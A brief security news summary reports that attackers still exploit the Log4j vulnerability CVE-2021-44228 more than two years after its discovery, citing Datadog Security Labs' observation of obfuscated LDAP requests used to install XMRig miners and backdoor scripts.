Organizations continue to face attacks exploiting the critical Log4j zero-day vulnerability even though it has been more than two years since the flaw's discovery, SecurityWeek reports.
The vulnerability, tagged as CVE-2021-44228, was first reported in November 2021 and led to a global scramble to implement patches. Despite these efforts, the flaw remains a persistent threat due to complex software dependencies that hinder comprehensive patching. Nation-state actors and cybercriminal groups, including those linked to China, Iran, North Korea, and Turkey, have incorporated Log4j exploits into their hacking tools. Datadog Security Labs recently uncovered ongoing exploits that target unpatched systems, allowing cybercriminals to deploy cryptocurrency miners and malicious backdoor scripts. In this new campaign, researchers observed that attackers used obfuscated LDAP requests to avoid detection, leaving them free to deploy XMRig cryptocurrency miners and install scripts to maintain long-term control over compromised systems. This ongoing exploitation underscores the challenge of eradicating vulnerabilities that remain unpatched years after their discovery.